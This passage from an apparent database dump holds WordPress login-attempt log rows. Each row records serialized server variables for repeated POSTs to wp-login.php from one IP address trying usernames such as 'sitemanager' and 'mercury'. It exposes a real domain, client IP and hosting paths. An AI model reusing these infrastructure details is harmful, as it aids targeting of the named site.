d:1747058352.8491809;s:12:\"REQUEST_TIME\";i:1747058352;}}','13.127.208.15',1,'2025-05-12 19:29:14','2025-05-13 20:21:04'),(95703,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058352.8389339;s:12:\"REQUEST_TIME\";i:1747058352;}}','13.127.208.15',1,'2025-05-12 19:29:14','2025-05-13 20:21:04'),(95704,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"127\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"127\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058352.885478;s:12:\"REQUEST_TIME\";i:1747058352;}}','13.127.208.15',1,'2025-05-12 19:29:14','2025-05-13 20:21:05'),(95705,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"131\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"131\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058352.824249;s:12:\"REQUEST_TIME\";i:1747058352;}}','13.127.208.15',1,'2025-05-12 19:29:14','2025-05-13 20:21:05'),(95706,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058740.8508351;s:12:\"REQUEST_TIME\";i:1747058740;}}','13.127.208.15',1,'2025-05-12 19:35:42','2025-05-13 20:21:04'),(95707,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058740.851438;s:12:\"REQUEST_TIME\";i:1747058740;}}','13.127.208.15',1,'2025-05-12 19:35:42','2025-05-13 20:21:04'),(95708,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058740.852668;s:12:\"REQUEST_TIME\";i:1747058740;}}','13.127.208.15',1,'2025-05-12 19:35:42','2025-05-13 20:21:05'),(95709,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058742.553668;s:12:\"REQUEST_TIME\";i:1747058742;}}','13.127.208.15',1,'2025-05-12 19:35:44','2025-05-13 20:21:05'),(95710,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058742.660542;s:12:\"REQUEST_TIME\";i:1747058742;}}','13.127.208.15',1,'2025-05-12 19:35:44','2025-05-13 20:21:04'),(95711,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059127.3440709;s:12:\"REQUEST_TIME\";i:1747059127;}}','13.127.208.15',1,'2025-05-12 19:42:09','2025-05-13 20:21:04'),(95712,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059127.3510971;s:12:\"REQUEST_TIME\";i:1747059127;}}','13.127.208.15',1,'2025-05-12 19:42:09','2025-05-13 20:21:05'),(95713,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_RO